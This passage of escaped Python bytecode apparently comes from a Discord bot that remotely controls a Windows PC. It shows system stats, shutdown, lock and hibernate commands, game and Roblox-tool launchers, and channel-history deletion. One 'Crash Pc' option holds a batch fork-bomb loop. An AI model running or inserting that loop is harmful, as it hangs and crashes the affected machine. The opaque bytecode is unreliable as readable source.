nf\x04d\x13d\x14\x84\x04\x83\x01Z\x0fe\x04j\x05j\x06d\x15e\x04j\x07j\x08d\x15d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x16d\x17\x84\x04\x83\x01Z\x10\x87\x00\x04\x00Z\x11S\x00)\x18\xda\x08mysystemc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00\x90\x01\x00\x00\xf3\x02\x00\x00\x00\x12\x00z\x11mysystem.__init__z\x08check Pcr\xda\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xd8\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00zXt\x01j\x02d\x02d\x03d\x04\x8d\x02}\x03|\x03j\x03d\x05t\x04t\x05\xa0\x06d\x06\xa1\x01\x83\x01\x9b\x00d\x07\x9d\x02d\x08d\t\x8d\x03\x01\x00|\x03j\x03d\nt\x04t\x05\xa0\x07\xa1\x00j\x08\x83\x01\x9b\x00d\x07\x9d\x02d\x08d\t\x8d\x03\x01\x00|\x03j\x03d\x0bt\x05\xa0\x07\xa1\x00j\td\x01\x14\x00t\x05\xa0\x07\xa1\x00j\n\x1b\x00\x9b\x00d\x07\x9d\x02d\x08d\t\x8d\x03\x01\x00|\x03j\x03d\x0ct\x0b\x83\x00d\x08d\t\x8d\x03\x01\x00|\x02j\x0c|\x03d\r\x8d\x01I\x00d\x00H\x00\x01\x00t\r|\x03\x83\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x0cd\x0e\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x0fNr\x0f\x00\x00\x00z\x15System Resource Usagez\'See CPU and memory usage of the system.r\xbb\x00\x00\x00z\tCPU Usage\xe9\x04\x00\x00\x00r\x9e\x00\x00\x00F)\x03r\'\x00\x00\x00r\x8e\x00\x00\x00Z\x06inlinez\x0cMemory Usagez\x10Available MemoryZ\x04Diskr\x1c\x00\x00\x00r\xcc\x00\x00\x00)\x0er\xbd\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00Z\tadd_fieldrw\x00\x00\x00r\x9f\x00\x00\x00Z\x0bcpu_percentZ\x0evirtual_memoryr\xa2\x00\x00\x00Z\tavailabler\xa1\x00\x00\x00r\xa4\x00\x00\x00r!\x00\x00\x00r&\x00\x00\x00)\x04r\xb4\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00r\xbe\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02b1\x91\x01\x00\x00s\x14\x00\x00\x00\x02\x80\x08\x03\x02\x01\x0e\x01 \x01 \x01*\x01\x12\x01&\x01\x1c\x01z\x0bmysystem.b1z\x08Crash Pcc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe5\x00\x00\x00)\x05Nr\x0f\x00\x00\x00z\x17:crash\nstart\ngoto crashr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xdd\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02s1\x9d\x01\x00\x00\xf3\x08\x00\x00\x00\x02\x80\x08\x03"\x01\x1c\x01z\x0bmysystem.s1Z\x04Lockc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe5\x00\x00\x00)\x05Nr\x0f\x00\x00\x00z\x0bSHUTDOWN /lr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xdd\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02s2\xa3\x01\x00\x00r\xf4\x00\x00\x00z\x0bmysystem.s2Z\x07Restartc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe5\x00\x00\x00)\x05Nr\x0f\x00\x00\x00z\x11SHUTDOWN -r -t 10r\xca\x00\x00\x00r\xcc\x00\x00\x00r\xdd\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02s3\xa9\x01\x00\x00r\xf4\x00\x00\x00z\x0bmysystem.s3Z\tHibernatec\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe5\x00\x00\x00)\x05Nr\x0f\x00\x00\x00z\x0bSHUTDOWN /hr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xdd\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02s4\xaf\x01\x00\x00r\xf4\x00\x00\x00z\x0bmysystem.s4Z\x08Shutdownc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xe9\x00\x00\x00r\xea\x00\x00\x00)\x04r\x8b\x00\x00\x00r\xeb\x00\x00\x00r\xd2\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02s5\xb5\x01\x00\x00r\xec\x00\x00\x00z\x0bmysystem.s5)\x12r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xdb\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00r\xed\x00\x00\x00r\xc6\x00\x00\x00r\xf2\x00\x00\x00r\xf3\x00\x00\x00r\xf5\x00\x00\x00r\xf6\x00\x00\x00r\xf7\x00\x00\x00r\xf8\x00\x00\x00r\xc7\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\xef\x00\x00\x00\x8f\x01\x00\x00s\x1c\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x0b\x18\x01\x14\x05\x18\x01\x14\x05\x18\x01\x14\x05\x18\x01\x14\x05 \x01r\xef\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s\xf8\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x04d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x08d\t\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\ne\x04j\x07j\x0cd\x0bd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x0cd\r\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x0ee\x04j\x07j\x08d\x0ed\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x0fd\x10\x84\x04\x83\x01Z\x0ee\x04j\x05j\x06d\x11e\x04j\x07j\x0fd\x11d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x12d\x13\x84\x04\x83\x01Z\x10e\x04j\x05j\x06d\x14e\x04j\x07j\x11d\x14d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x15d\x16\x84\x04\x83\x01Z\x12\x87\x00\x04\x00Z\x13S\x00)\x17\xda\x07openappc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00\xba\x01\x00\x00r\xf0\x00\x00\x00z\x10openapp.__init__r\xd8\x00\x00\x00Z\x05game1r\xda\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sP\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x14t\x01\xa0\x02t\x03\x83\x00d\x02d\x03g\x03\xa1\x01\x01\x00|\x02\xa0\x04d\x04\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x04d\x05\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x06Nr\x0f\x00\x00\x00z\x19--launch-product=valorantz\x17--launch-patchline=liver\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05r\xbd\x00\x00\x00\xda\nsubprocess\xda\x05Popenr\x83\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04app1\xbb\x01\x00\x00\xf3\x08\x00\x00\x00\x02\x80\x08\x03*\x01\x1c\x01z\x0copenapp.app1rI\x00\x00\x00Z\x05game2c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x04\x00\x00\x00\x83\x00\x00\x00s\xe0\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00t\x01j\x02d\x02d\x03\x8d\x01}\x03t\x03\xa0\x04d\x04\xa1\x01j\x05\xa0\x06d\x05\xa1\x01}\x04t\x07\xa0\x08d\x06\xa1\x01d\x07\x17\x00|\x04\x17\x00\x89\x00d\x08t\x01j\tf\x02d\td\n\x84\x04}\x05d\x08t\x01j\tf\x02\x87\x00f\x01d\x0bd\x0c\x84\x0c}\x06d\x08t\x01j\tf\x02d\rd\x0e\x84\x04}\x07d\x08t\x01j\tf\x02d\x0fd\x10\x84\x04}\x08|\x05t\n_\x0b|\x06t\x0c_\x0b|\x07t\r_\x0b|\x08t\x0e_\x0bt\x01j\x0f\xa0\x10\xa1\x00}\t|\t\xa0\x11t\n\xa1\x01\x01\x00|\t\xa0\x11t\x0c\xa1\x01\x01\x00|\t\xa0\x11t\r\xa1\x01\x01\x00|\t\xa0\x11t\x0e\xa1\x01\x01\x00|\x02j\x12|\x03|\td\x11\x8d\x02I\x00d\x00H\x00}\nd\x00S\x00)\x12Nr\x0f\x00\x00\x00u7\x00\x00\x00\xe0\xb9\x80\xe0\xb8\xa5\xe0\xb8\xb7\xe0\xb8\xad\xe0\xb8\x81\xe0\xb8\xa7\xe0\xb8\xb4\xe0\xb8\x98\xe0\xb8\xb5\xe0\xb8\x81\xe0\xb8\xb2\xe0\xb8\xa3\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 Robloxr\x11\x00\x00\x00z#http://setup.roblox.com/version.txt\xda\x05asciiZ\x0cLOCALAPPDATAz\x11\\Roblox\\Versions\\r\xb8\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x00\x00\x00s\x1e\x00\x00\x00\x81\x01t\x00t\x01\x83\x01\x01\x00|\x00\xa0\x02d\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x02Nr\xca\x00\x00\x00)\x03rW\x00\x00\x00rV\x00\x00\x00r!\x00\x00\x00\xa9\x01r\xb8\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bg1_callback\xc8\x01\x00\x00s\x04\x00\x00\x00\x02\x80\x1c\x00z!openapp.app2.<locals>.g1_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x93\x00\x00\x00sL\x00\x00\x00\x81\x01z\x16t\x00\xa0\x01\x9d\x00\x88\x00\x17\x00d\x01\x17\x00d\x02g\x02\xa1\x01\x01\x00|\x00\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x02d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nz\x19\\RobloxPlayerLauncher.exez\x04-appr\xca\x00\x00\x00r\xcc\x00\x00\x00)\x03r\xfa\x00\x00\x00r\xfb\x00\x00\x00r!\x00\x00\x00r\xff\x00\x00\x00\xa9\x01r3\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bg2_callback\xc9\x01\x00\x00s\x06\x00\x00\x00\x02\x80.\x01\x1c\x01z!openapp.app2.<locals>.g2_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00s@\x00\x00\x00\x81\x01z\x10t\x00\xa0\x01d\x01\xa1\x01\x01\x00|\x00\xa0\x02d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nz\x17https://web.roblox.com/r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x03rT\x00\x00\x00rU\x00\x00\x00r!\x00\x00\x00r\xff\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bg3_callback\xcc\x01\x00\x00s\x06\x00\x00\x00\x02\x80"\x01\x1c\x01z!openapp.app2.<locals>.g3_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\xd3\x00\x00\x00sd\x00\x00\x00\x81\x01t\x00j\x01\xa0\x02\xa1\x00}\x01d\x01t\x00j\x03f\x02d\x02d\x03\x84\x04}\x02d\x01t\x00j\x03f\x02d\x04d\x05\x84\x04}\x03|\x02t\x04_\x05|\x03t\x06_\x05|\x01\xa0\x07t\x04\xa1\x01\x01\x00|\x01\xa0\x07t\x06\xa1\x01\x01\x00|\x00j\x08t\t|\x01d\x06\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x07Nr\xb8\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00s:\x00\x00\x00\x81\x01z\rd\x01a\x00t\x01j\x02t\x03d\x02\x8d\x01\xa0\x04\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x05d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04NTr\x93\x00\x00\x00r\xcc\x00\x00\x00)\x06r[\x00\x00\x00r\x96\x00\x00\x00r\x97\x00\x00\x00r\xa7\x00\x00\x00r\x98\x00\x00\x00r!\x00\x00\x00r\xff\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0baw_callback\xd1\x01\x00\x00s\x06\x00\x00\x00\x02\x80\x1c\x01\x1c\x01z6openapp.app2.<locals>.g4_callback.<locals>.aw_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00s*\x00\x00\x00\x81\x01z\x05d\x01a\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x01d\x02\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x03NFr\xcc\x00\x00\x00)\x02r[\x00\x00\x00r!\x00\x00\x00r\xff\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bda_callback\xd4\x01\x00\x00s\x06\x00\x00\x00\x02\x80\x0c\x01\x1c\x01z6openapp.app2.<locals>.g4_callback.<locals>.da_callback\xa9\x02r\x1d\x00\x00\x00Z\x04view)\nr\x1f\x00\x00\x00r\xb0\x00\x00\x00\xda\x04Viewr\xc6\x00\x00\x00\xda\x02onr\xc0\x00\x00\x00\xda\x03offr\xb2\x00\x00\x00r!\x00\x00\x00\xda\x06aa1211)\x04r\xb8\x00\x00\x00Z\x05asdawr\x04\x01\x00\x00r\x05\x01\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bg4_callback\xcf\x01\x00\x00s\n\x00\x00\x00\x02\x80\n\x01\x10\x01\x10\x038\x03z!openapp.app2.<locals>.g4_callbackr\x06\x01\x00\x00)\x13r\xbd\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00rQ\x00\x00\x00r\x85\x00\x00\x00Z\x07content\xda\x06decoder2\x00\x00\x00\xda\x06getenvr\xc6\x00\x00\x00\xda\x02g1r\xc0\x00\x00\x00\xda\x02g2\xda\x02g3\xda\x02g4r\xb0\x00\x00\x00r\x07\x01\x00\x00r\xb2\x00\x00\x00r!\x00\x00\x00)\x0br\xb4\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00r\x1d\x00\x00\x00\xda\x07versionr\x00\x01\x00\x00r\x02\x01\x00\x00r\x03\x01\x00\x00r\x0b\x01\x00\x00\xda\x06myview\xda\x03msgr\x19\x00\x00\x00r\x01\x01\x00\x00r\x0e\x00\x00\x00\xda\x04app2\xc1\x01\x00\x00s&\x00\x00\x00\x02\x80\x08\x03\x0c\x01\x12\x01\x12\x01\x10\x01\x14\x01\x10\x03\x10\x03\x06\t\x06\x01\x06\x01\x06\x01\n\x01\n\x01\n\x01\n\x01\n\x01\x18\x01z\x0copenapp.app2r\xe1\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3P\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x14t\x01\xa0\x02t\x03\x9b\x00d\x02\x9d\x02g\x01\xa1\x01\x01\x00|\x02\xa0\x04d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x04d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00z\x15/Synapse Launcher.exer\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05r\xbd\x00\x00\x00r\xfa\x00\x00\x00r\xfb\x00\x00\x00r;\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04app3\xe2\x01\x00\x00r\xfd\x00\x00\x00z\x0copenapp.app3r\xe3\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sJ\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x11t\x01\xa0\x02d\x02g\x01\xa1\x01\x01\x00|\x02\xa0\x03d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00z\x19./lib/Multiple_ROBLOX.exer\xca\x00\x00\x00r\xcc\x00\x00\x00)\x04r\xbd\x00\x00\x00r\xfa\x00\x00\x00r\xfb\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04app4\xe8\x01\x00\x00s\x08\x00\x00\x00\x02\x80\x08\x03$\x01\x1c\x01z\x0copenapp.app4r\xe6\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\x16\x01\x00\x00)\x05Nr\x0f\x00\x00\x00z\x19/.minecraft/TLauncher.exer\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05r\xbd\x00\x00\x00r\xfa\x00\x00\x00r\xfb\x00\x00\x00\xda\x0bappdata_dirr!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04app5\xee\x01\x00\x00r\xfd\x00\x00\x00z\x0copenapp.app5)\x14r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xdb\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00r\xed\x00\x00\x00r\xc6\x00\x00\x00r\xfc\x00\x00\x00r\xee\x00\x00\x00r\x15\x01\x00\x00r\x17\x01\x00\x00\xda\x07blurpler\x18\x01\x00\x00r-\x00\x00\x00r\x1a\x01\x00\x00r\xc7\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\xf9\x00\x00\x00\xb9\x01\x00\x00s\x18\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x05\x18\x01\x14 \x18\x01\x14\x05\x18\x01\x14\x05 \x01r\xf9\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s\xa0\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x0cd\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x0ce\x04j\x07j\x0cd\x0cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\rd\x0e\x84\x04\x83\x01Z\x0e\x87\x00\x04\x00Z\x0fS\x00)\x0f\xda\tdSettingsc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00\xf5\x01\x00\x00r\xf0\x00\x00\x00z\x12dSettings.__init__z\x0cShow Consoler\xda\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00\xf3t\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00d\x02t\x01j\x02f\x02d\x03d\x04\x84\x04}\x03d\x02t\x01j\x02f\x02d\x05d\x06\x84\x04}\x04|\x03t\x03_\x04|\x04t\x05_\x04t\x01j\x06\xa0\x07\xa1\x00}\x05|\x05\xa0\x08t\x03\xa1\x01\x01\x00|\x05\xa0\x08t\x05\xa1\x01\x01\x00|\x02j\tt\x01j\nd\x07d\x08\x8d\x01|\x05d\t\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\nNr\x0f\x00\x00\x00r\xb8\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00\xf3>\x00\x00\x00\x81\x01z\x0ft\x00d\x01\x83\x01\x01\x00|\x00\xa0\x01d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x01d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04NTr\xca\x00\x00\x00r\xcc\x00\x00\x00\xa9\x02r\x1a\x00\x00\x00r!\x00\x00\x00r\xff\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0br1_callback\xfa\x01\x00\x00\xf3\x06\x00\x00\x00\x02\x80 \x01\x1c\x01z(dSettings.Settings1.<locals>.r1_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00r\x1e\x01\x00\x00)\x04NFr\xca\x00\x00\x00r\xcc\x00\x00\x00r\x1f\x01\x00\x00r\xff\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0br2_callback\xfd\x01\x00\x00r!\x01\x00\x00z(dSettings.Settings1.<locals>.r2_callbacku5\x00\x00\x00\xe0\xb8\x81\xe0\xb8\xb2\xe0\xb8\xa3\xe0\xb9\x81\xe0\xb8\xaa\xe0\xb8\x94\xe0\xb8\x87\xe0\xb8\xab\xe0\xb8\x99\xe0\xb9\x89\xe0\xb8\xb2\xe0\xb8\x95\xe0\xb9\x88\xe0\xb8\xb2\xe0\xb8\x87 Consoler\x11\x00\x00\x00r\x06\x01\x00\x00\xa9\x0br\xbd\x00\x00\x00r\x1f\x00\x00\x00r\xc6\x00\x00\x00r\x08\x01\x00\x00r\xc0\x00\x00\x00r\t\x01\x00\x00r\xb0\x00\x00\x00r\x07\x01\x00\x00r\xb2\x00\x00\x00r!\x00\x00\x00r\xbe\x00\x00\x00)\x06r\xb4\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00r \x01\x00\x00r"\x01\x00\x00r\x13\x01\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\tSettings1\xf6\x01\x00\x00s\x14\x00\x00\x00\x02\x80\x08\x03\x10\x01\x10\x03\x06\x03\x06\x01\n\x01\n\x01\n\x01 \x01z\x13dSettings.Settings1z\rclose Consolec\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sf\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x1ft\x01\xa0\x02t\x01j\x03d\x02k\x02r\x0fd\x03n\x01d\x04\xa1\x01\x01\x00t\x04d\x05t\x05j\x06\x9b\x00\x9d\x02\x83\x01\x01\x00|\x02\xa0\x07d\x06\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x07d\x07\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x08Nr\x0f\x00\x00\x00r\x9d\x00\x00\x00\xda\x03cls\xda\x05clear\xfa\x0bBOT NAME : r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x08r\xbd\x00\x00\x00r2\x00\x00\x00rp\x00\x00\x00r\'\x00\x00\x00r#\x00\x00\x00\xda\x03bot\xda\x04userr!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bSettingsaa2\x06\x02\x00\x00s\x08\x00\x00\x00\x02\x80\x08\x03@\x01\x1c\x01z\x15dSettings.Settingsaa2r%\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00sf\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00|\x02j\x01t\x02j\x03d\x02d\x03\x8d\x01d\x04\x8d\x01I\x00d\x00H\x00\x01\x00t\x04\xa0\x05t\x06\xa1\x01}\x03|\x03j\x07d\x00d\x05\x8d\x012\x00z\r3\x00d\x00H\x00W\x00}\x04|\x04\xa0\x08\xa1\x00I\x00d\x00H\x00\x01\x00q\x1d6\x00d\x06a\tt\n\x83\x00\x01\x00d\x00S\x00)\x07Nr\x0f\x00\x00\x00z\x07quit...r\x11\x00\x00\x00r\x1c\x00\x00\x00\xa9\x01Z\x05limitF)\x0br\xbd\x00\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r(\x01\x00\x00\xda\x0bget_channel\xda\tchannelid\xda\x07history\xda\x06delete\xda\x04yyttr%\x00\x00\x00\xa9\x05r\xb4\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00\xda\x07channel\xda\x07messager\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\nSettings22\x0c\x02\x00\x00s\x0c\x00\x00\x00\x02\x80\x08\x03\x1a\x01\n\x01*\x01\x0e\x01z\x14dSettings.Settings22)\x10r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xdb\x00\x00\x00r,\x00\x00\x00r\x1b\x01\x00\x00r\xed\x00\x00\x00r\xc6\x00\x00\x00r$\x01\x00\x00r.\x00\x00\x00r*\x01\x00\x00r4\x01\x00\x00